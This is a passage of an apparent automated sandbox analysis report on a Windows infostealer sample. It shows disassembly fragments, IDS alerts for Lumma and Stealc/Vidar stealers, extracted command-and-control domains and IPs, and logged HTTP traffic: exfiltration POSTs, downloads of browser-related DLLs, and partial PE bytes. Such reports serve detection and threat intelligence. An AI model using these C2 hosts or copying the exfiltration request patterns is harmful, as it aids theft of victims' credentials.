                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp+20h]13_2_00B2E1F1
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]13_2_00B2C16C
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov word ptr [edx], ax13_2_00B42158
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov byte ptr [edi], al13_2_00B4A3E0
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov byte ptr [edi], al13_2_00B4A3D9
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then movzx ecx, word ptr [edi]13_2_00B424F8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]13_2_00B2E448
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov ebx, eax13_2_00B22558
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov ebp, eax13_2_00B22558
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp al, 2Eh13_2_00B446B7
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp+14h]13_2_00B426A8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then jmp eax13_2_00B42778
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp]13_2_00B449E3
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]13_2_00B5EABD
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]13_2_00B1CA28
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov byte ptr [edi], al13_2_00B4AA72
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]13_2_00B5EB32
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h13_2_00B5CB68
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then jmp dword ptr [00451A70h]13_2_00B46C40
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h13_2_00B38C49
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]13_2_00B2AD3A
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp]13_2_00B46D18
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then movzx eax, byte ptr [ebx+edx-06h]13_2_00B1ED08
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then movzx esi, byte ptr [edx+ebp]13_2_00B1ED08
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov dword ptr [esp], 00000000h13_2_00B32ED8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h13_2_00B3EEC8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp+24h]13_2_00B44E06
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]13_2_00B2AE05
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov byte ptr [edi], al13_2_00B4AE60
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov byte ptr [edi], al13_2_00B4AE60
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov byte ptr [ebx], al13_2_00B4AE60
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov byte ptr [edi], al13_2_00B4AE60
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov word ptr [eax], dx13_2_00B38FA8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov esi, ebx13_2_00B60F90
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h13_2_00B370AE
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov byte ptr [ebx], al13_2_00B2B034
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp]13_2_00B41018
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]13_2_00B5D063
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov dword ptr [esp+34h], edx13_2_00B191CA
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov word ptr [eax], cx13_2_00B3F128
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov word ptr [eax], cx13_2_00B3F128
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp+00000688h]13_2_00B352C4
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then dec ebx13_2_00B572C8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]13_2_00B2D225
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]13_2_00B2D215
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov dword ptr [esp+08h], ecx13_2_00B1925D
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], D518DBA1h13_2_00B573B8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], D1A85EEEh13_2_00B573B8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp]13_2_00B453BA
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov dword ptr [esp+18h], 3602043Ah13_2_00B473A0
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov dword ptr [esp+50h], 00000000h13_2_00B2D394
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov word ptr [eax], dx13_2_00B393D1
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh13_2_00B5F508
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]13_2_00B59578
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp+68h]13_2_00B5F6F8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp+000000D0h]13_2_00B3560A
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [ebp-000000C0h]13_2_00B277EF
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp+24h]13_2_00B458E2
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh13_2_00B618E8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then movzx ebx, byte ptr [edx]13_2_00B538C8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp+54h]13_2_00B37A89
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov byte ptr [ebx], al13_2_00B4BAD6
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov byte ptr [ebx], al13_2_00B4BAD6
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov byte ptr [ebx], al13_2_00B4BAD6
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov byte ptr [ebx], al13_2_00B4BAD6
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]13_2_00B1DAD8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]13_2_00B27AD8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h13_2_00B5BA38
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp byte ptr [ebp+ebx+00h], 00000000h13_2_00B45A23
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh13_2_00B61A78
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then jmp dword ptr [0045042Ch]13_2_00B37A4B
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]13_2_00B2BBF4
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h13_2_00B61BF8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh13_2_00B61BF8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]13_2_00B43B2E
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp eax, C0000004h13_2_00B35CD6
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp]13_2_00B5BC78
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then xor eax, eax13_2_00B43DCE
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp]13_2_00B25E98
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]13_2_00B25E98
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then jmp eax13_2_00B2DE12
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 69F07BF2h13_2_00B3FE00
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]13_2_00B47F88
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 64567875h13_2_00B5BF18
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h13_2_00B5FF78

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2056394 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (absorptioniw .site) : 192.168.2.8:50732 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056400 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mysterisop .site) : 192.168.2.8:55865 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056402 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionsmw .store) : 192.168.2.8:54212 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056392 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abnomalrkmu .site) : 192.168.2.8:54546 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056406 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (snarlypagowo .site) : 192.168.2.8:61121 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056410 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (treatynreit .site) : 192.168.2.8:59551 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.8:56268 -> 45.132.206.251:80
                          Source: Network trafficSuricata IDS: 2056408 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soldiefieop .site) : 192.168.2.8:52448 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chorusarorp .site) : 192.168.2.8:63060 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.8:56237 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.8:56237
                          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.8:56238
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:56266 -> 172.67.166.76:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:56266 -> 172.67.166.76:443
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: treatynreit.site
                          Source: Malware configuration extractorURLs: questionsmw.stor
                          Source: Malware configuration extractorURLs: mysterisop.site
                          Source: Malware configuration extractorURLs: soldiefieop.site
                          Source: Malware configuration extractorURLs: abnomalrkmu.site
                          Source: Malware configuration extractorURLs: absorptioniw.site
                          Source: Malware configuration extractorURLs: snarlypagowo.site
                          Source: Malware configuration extractorURLs: chorusarorp.site
                          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                          Source: global trafficTCP traffic: 192.168.2.8:56235 -> 162.159.36.2:53
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 03 Oct 2024 13:15:14 GMTContent-Type: application/octet-streamContent-Length: 540536Last-Modified: Thu, 03 Oct 2024 12:52:19 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fe9383-83f78"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 24 b2 eb 8a 60 d3 85 d9 60 d3 85 d9 60 d3 85 d9 b3 a1 86 d8 6c d3 85 d9 b3 a1 80 d8 ca d3 85 d9 b3 a1 81 d8 75 d3 85 d9 a2 52 81 d8 72 d3 85 d9 a2 52 86 d8 74 d3 85 d9 b3 a1 84 d8 65 d3 85 d9 60 d3 84 d9 39 d3 85 d9 a2 52 80 d8 2e d3 85 d9 93 51 8c d8 61 d3 85 d9 93 51 7a d9 61 d3 85 d9 93 51 87 d8 61 d3 85 d9 52 69 63 68 60 d3 85 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 93 fe 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 c8 01 00 00 5a 06 00 00 00 00 00 72 6f 00 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 6d 02 00 3c 00 00 00 00 30 08 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 16 08 00 78 29 00 00 00 40 08 00 ec 1a 00 00 78 50 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 4f 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 34 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cc c6 01 00 00 10 00 00 00 c8 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 94 00 00 00 e0 01 00 00 96 00 00 00 cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c0 a4 05 00 00 80 02 00 00 96 05 00 00 62 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 30 08 00 00 02 00 00 00 f8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ec 1a 00 00 00 40 08 00 00 1c 00 00 00 fa 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 49.12.197.9 49.12.197.9
                          Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                          Source: Joe Sandbox ViewIP Address: 147.45.44.104 147.45.44.104
                          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                          Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56237 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49714 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49713 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49715 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56240 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56239 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56238 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56241 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56244 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56242 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56245 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56247 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56249 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56250 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56251 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56252 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56253 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56257 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56256 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56255 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56254 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56258 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56265 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:56259 -> 147.45.44.104:80
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56262 -> 49.12.197.9:443
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFIIIJJKJJKEBGIDGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAEBAFBGIDHCBFHIECFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCFHJDBKJKEBFHJEHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 5957Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAECAFHDBGIDGCAEHJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCGDAAKFHIDBFIDBKFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1081Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAECFCAAECBGDGDHIEHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGDHJECFCFCAKFHCFIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
